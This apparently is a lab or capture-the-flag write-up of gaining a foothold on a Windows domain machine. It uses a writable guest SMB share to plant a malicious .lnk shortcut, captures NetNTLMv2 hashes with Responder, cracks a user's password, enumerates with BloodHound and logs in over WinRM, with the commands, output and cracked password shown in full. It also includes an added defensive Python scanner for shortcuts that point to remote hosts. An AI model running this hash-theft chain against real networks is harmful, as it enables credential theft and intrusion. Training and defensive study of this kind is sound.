Foothold
❯ smbclient '\\192.168.209.30\nara' -U Guest%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Oct 24 06:35:43 2024
.. DHS 0 Thu Oct 24 06:14:06 2024
Documents D 0 Sun Jul 30 09:03:13 2023
Important.txt A 2200 Sun Jul 30 09:05:31 2023
IT D 0 Sun Jul 30 11:22:50 2023
7699711 blocks of size 4096. 3934768 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \Important.txt of size 2200 as Important.txt (12.3 KiloBytes/sec) (average 12.3 KiloBytes/sec)
smb: \> cd Documents\
smb: \Documents\> ls
. D 0 Sun Jul 30 09:03:13 2023
.. D 0 Thu Oct 24 06:35:43 2024
7699711 blocks of size 4096. 3934768 blocks available
smb: \Documents\> cd ..
smb: \> cd IT
smb: \IT\> ls
. D 0 Sun Jul 30 11:22:50 2023
.. D 0 Thu Oct 24 06:35:43 2024
7699711 blocks of size 4096. 3934768 blocks available
smb: \IT\>
The share is writable as Guest, so we can create a malicious .lnk file with the netexec slinky module, drop it on the share, and capture NetNTLMv2 hashes with Responder when a user browses the folder.
sudo responder -I tun0 -A
❯ smbclient '\\192.168.209.30\nara' -U Guest%''
smb: \> ls
. D 0 Thu Oct 24 06:59:36 2024
.. DHS 0 Thu Oct 24 06:14:06 2024
Documents D 0 Thu Oct 24 06:56:16 2024
Important.txt A 2200 Sun Jul 30 09:05:31 2023
IT D 0 Thu Oct 24 06:56:27 2024
pwned.lnk A 113 Thu Oct 24 06:59:37 2024
7699711 blocks of size 4096. 3932839 blocks available
smb: \> get pwned.lnk
getting file \pwned.lnk of size 113 as pwned.lnk (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> cd Documents\
smb: \Documents\> put pwned.lnk
putting file pwned.lnk as \Documents\pwned.lnk (0.9 kb/s) (average 0.9 kb/s)
smb: \Documents\>
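The defensive counterpart to the step above is finding shortcut files on a share whose embedded paths point at a remote UNC host rather than a local drive. The following scanner is an added example for this writeup, not part of the original post or of any tool it uses; it checks the Shell Link header (HeaderSize 0x4C and the fixed LinkCLSID), then looks for UNC-style strings in both ASCII and UTF-16LE, which is how the icon and target locations are stored. It is a heuristic, not a full MS-SHLLINK parser, and the sample bytes and the 192.0.2.10 host are constructed for the test.

```python
import os
import re
import struct
from typing import Dict, List

# Shell Link header: HeaderSize is always 0x4C, followed by the fixed LinkCLSID
# {00021401-0000-0000-C000-000000000046} stored with little-endian field order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# UNC path: \\host\share[\more...] - one pattern for raw ASCII bytes, one for
# decoded text (UTF-16LE strings are how .lnk files store most path data).
_UNC = r"\\\\[A-Za-z0-9._-]+(?:\\[A-Za-z0-9 ._$~%()-]+)+"
UNC_ASCII = re.compile(_UNC.encode("ascii"))
UNC_TEXT = re.compile(_UNC)


def is_lnk(data: bytes) -> bool:
    """True if the bytes start with a valid Shell Link header."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def find_unc_paths(data: bytes) -> List[str]:
    """Return every UNC path embedded in the blob, in ASCII or UTF-16LE."""
    found = [m.group(0).decode("ascii") for m in UNC_ASCII.finditer(data)]
    # UTF-16LE strings can start at an odd byte offset, so decode both alignments;
    # errors="ignore" drops the binary noise and any trailing half code unit.
    for offset in (0, 1):
        text = data[offset:].decode("utf-16-le", errors="ignore")
        found.extend(UNC_TEXT.findall(text))
    return list(dict.fromkeys(found))  # de-duplicate, keep first-seen order


def triage_lnk(name: str, data: bytes) -> Dict[str, object]:
    """Classify one file: a .lnk whose paths leave the machine is worth a look."""
    lnk = is_lnk(data)
    remote = find_unc_paths(data) if lnk else []
    return {"file": name, "is_lnk": lnk, "remote_paths": remote, "suspicious": bool(remote)}


def scan_directory(root: str) -> List[Dict[str, object]]:
    """Walk a mounted share and triage every *.lnk found (stat/read errors are skipped)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".lnk"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    results.append(triage_lnk(path, fh.read()))
            except OSError:
                continue
    return results


def build_sample(path_str: str) -> bytes:
    """Constructed fixture: a header that passes is_lnk() followed by a UTF-16LE
    path placed at an odd offset. Not a complete Shell Link, only enough to scan."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID).ljust(LNK_HEADER_SIZE, b"\x00")
    return header + b"\x01\x02\x03" + path_str.encode("utf-16-le") + b"\x00\x00"


if __name__ == "__main__":
    # 192.0.2.10 is a documentation (TEST-NET-1) address used only for this constructed sample.
    bad = build_sample(r"\\192.0.2.10\share\icon.ico")
    good = build_sample(r"C:\Windows\notepad.exe")
    print(triage_lnk("pwned.lnk", bad))
    print(triage_lnk("harmless.lnk", good))
```

Run `scan_directory("/mnt/share")` against a share mounted read-only to list every shortcut that references another host; anything in a user-browsable folder like `Documents` that points off-box deserves an owner and a reason to exist.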
❯ hashcat -m 5600 tracey.white.hash ~/rockyou.txt -O --show
TRACY.WHITE::NARASEC:7b050286eefef12e:77c3718b5cbdf3106510154e5f93f9b6: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:zqwj041FGX
Tracy.White:zqwj041FGX
❯ bloodhound-python -d nara-security.com -u Tracy.White -p zqwj041FGX -ns 192.168.209.30 -c all
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
INFO: Found AD domain: nara-security.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: nara.nara-security.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: nara.nara-security.com
INFO: Found 14 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Nara.nara-security.com
INFO: Done in 00M 08S
With these credentials we can add ourselves to the remote access group, which gives us a WinRM login:
❯ evil-winrm -i 192.168.209.30 -u 'Tracy.White' -p 'zqwj041FGX'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tracy.white\Documents> whoami ; type C:\Users\tracy.white\Desktop\local.txt
narasec\tracy.white
fbf8848184079e7199ce476036c4cbe2
*Evil-WinRM* PS C:\Users\tracy.white\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::c6b7:9762:15d:868c%4
IPv4 Address. . . . . . . . . . . : 192.168.209.30
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.209.254